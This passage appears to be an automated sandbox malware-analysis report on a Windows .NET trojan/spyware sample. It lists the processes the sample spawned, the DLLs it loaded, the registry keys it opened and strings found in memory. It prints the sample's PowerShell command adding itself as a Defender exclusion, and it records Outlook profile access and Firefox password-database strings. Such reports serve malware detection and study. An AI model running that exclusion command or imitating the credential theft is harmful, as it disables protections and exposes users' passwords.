                Source: mKv3sKQ5Q4E7waF.exe, 00000003.00000002.990846497.0000000001347000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameHelp.Exej% vs mKv3sKQ5Q4E7waF.exe
                Source: mKv3sKQ5Q4E7waF.exeBinary or memory string: OriginalFilenamezpaD.exe> vs mKv3sKQ5Q4E7waF.exe
                Source: mKv3sKQ5Q4E7waF.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: mKv3sKQ5Q4E7waF.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.mKv3sKQ5Q4E7waF.exe.6dc0000.3.raw.unpack, FolyCtNo8kLdxjDknn.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.mKv3sKQ5Q4E7waF.exe.6dc0000.3.raw.unpack, FolyCtNo8kLdxjDknn.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.mKv3sKQ5Q4E7waF.exe.6dc0000.3.raw.unpack, jYZmvtAx2Fnacyn2Tb.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.mKv3sKQ5Q4E7waF.exe.6dc0000.3.raw.unpack, jYZmvtAx2Fnacyn2Tb.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.mKv3sKQ5Q4E7waF.exe.6dc0000.3.raw.unpack, jYZmvtAx2Fnacyn2Tb.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@12/12@18/14
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\mKv3sKQ5Q4E7waF.exe.logJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6940:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sw0f32q0.yuk.ps1Jump to behavior
                Source: mKv3sKQ5Q4E7waF.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: mKv3sKQ5Q4E7waF.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: help.exe, 00000006.00000002.3289014379.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000006.00000002.3289014379.0000000000716000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000006.00000003.1177101920.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000006.00000003.1176989330.00000000006C7000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000006.00000003.1184416266.00000000006F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: mKv3sKQ5Q4E7waF.exeReversingLabs: Detection: 25%
                Source: unknownProcess created: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe "C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe"
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeProcess created: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe "C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exeProcess created: C:\Windows\SysWOW64\help.exe "C:\Windows\SysWOW64\help.exe"
                Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe"Jump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeProcess created: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe "C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe"Jump to behavior
                Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exeProcess created: C:\Windows\SysWOW64\help.exe "C:\Windows\SysWOW64\help.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\help.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\help.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\help.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\help.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\help.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\help.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\help.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\help.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\help.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\help.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\help.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\help.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\help.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\help.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\help.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\help.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\help.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\help.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\help.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\help.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\help.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\help.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: mKv3sKQ5Q4E7waF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: mKv3sKQ5Q4E7waF.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: mKv3sKQ5Q4E7waF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: zpaD.pdbSHA256 source: mKv3sKQ5Q4E7waF.exe
                Source: Binary string: wntdll.pdbUGP source: mKv3sKQ5Q4E7waF.exe, 00000003.00000002.993274250.0000000001940000.00000040.00001000.00020000.00000000.sdmp, help.exe, 00000006.00000003.990067231.0000000000909000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000006.00000002.3290844850.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp, help.exe, 00000006.00000003.999586311.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000006.00000002.3290844850.0000000002C70000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: mKv3sKQ5Q4E7waF.exe, mKv3sKQ5Q4E7waF.exe, 00000003.00000002.993274250.0000000001940000.00000040.00001000.00020000.00000000.sdmp, help.exe, help.exe, 00000006.00000003.990067231.0000000000909000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000006.00000002.3290844850.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp, help.exe, 00000006.00000003.999586311.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000006.00000002.3290844850.0000000002C70000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: help.pdbGCTL source: mKv3sKQ5Q4E7waF.exe, 00000003.00000002.990846497.0000000001337000.00000004.00000020.00020000.00000000.sdmp, vnV7v1GankdEyS2eDT.exe, 00000005.00000002.3289759392.000000000099E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: help.pdb source: mKv3sKQ5Q4E7waF.exe, 00000003.00000002.990846497.0000000001337000.00000004.00000020.00020000.00000000.sdmp, vnV7v1GankdEyS2eDT.exe, 00000005.00000002.3289759392.000000000099E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: zpaD.pdb source: mKv3sKQ5Q4E7waF.exe
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: vnV7v1GankdEyS2eDT.exe, 00000005.00000002.3290284490.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp, vnV7v1GankdEyS2eDT.exe, 00000008.00000000.1066377820.0000000000E7F000.00000002.00000001.01000000.0000000B.sdmp

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: 0.2.mKv3sKQ5Q4E7waF.exe.6dc0000.3.raw.unpack, jYZmvtAx2Fnacyn2Tb.cs.Net Code: kvOYebFsIo System.Reflection.Assembly.Load(byte[])
                Source: mKv3sKQ5Q4E7waF.exeStatic PE information: 0xC535338B [Sun Nov 4 23:02:35 2074 UTC]
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 0_2_008DEE80 pushfd ; iretd 0_2_008DEE81
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 0_2_08546C22 push 0000005Dh; ret 0_2_08546CED
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0041E87E push es; retf 3_2_0041E880
